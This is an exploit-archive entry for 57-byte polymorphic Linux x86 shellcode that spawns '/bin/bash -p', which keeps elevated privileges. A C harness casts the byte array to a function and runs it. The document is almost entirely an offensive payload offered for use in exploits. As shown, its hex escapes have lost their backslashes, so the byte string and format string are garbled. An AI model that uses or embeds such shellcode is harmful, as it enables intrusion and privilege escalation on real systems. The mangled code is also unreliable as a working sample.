[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Linux x86 - polymorphic execve("/bin/bash","-p",NULL) - 57 bytes
# Published : 2010-05-05
# Author : Jonathan Salwan
# Previous Title : WinXP SP2 Fr Download and Exec Shellcode
# Next Title : Linux x86 - execve("/bin/bash","-p",NULL) - 33 bytes
/*
Title: Linux x86 - polymorphic execve("/bin/bash", ["/bin/bash", "-p"], NULL) - 57 bytes
Author: Jonathan Salwan
Mail: submit@shell-storm.org
Web: http://www.shell-storm.org
!Database of Shellcodes http://www.shell-storm.org/shellcode/
sh sets (euid, egid) to (uid, gid) if -p not supplied and uid < 100
Read more: http://www.faqs.org/faqs/unix-faq/shell/bash/#ixzz0mzPmJC49
Based in http://www.shell-storm.org/shellcode/files/shellcode-606.php
*/
#include <stdio.h>
char shellcode[] = "xebx11x5ex31xc9xb1x21x80"
"x6cx0exffx01x80xe9x01x75"
"xf6xebx05xe8xeaxffxffxff"
"x6bx0cx59x9ax53x67x69x2e"
"x71x8axe2x53x6bx69x69x30"
"x63x62x74x69x30x63x6ax6f"
"x8axe4x53x52x54x8axe2xce"
"x81";
int main(int argc, char *argv[])
{
fprintf(stdout,"Length: %dn",strlen(shellcode));
(*(void(*)()) shellcode)();
}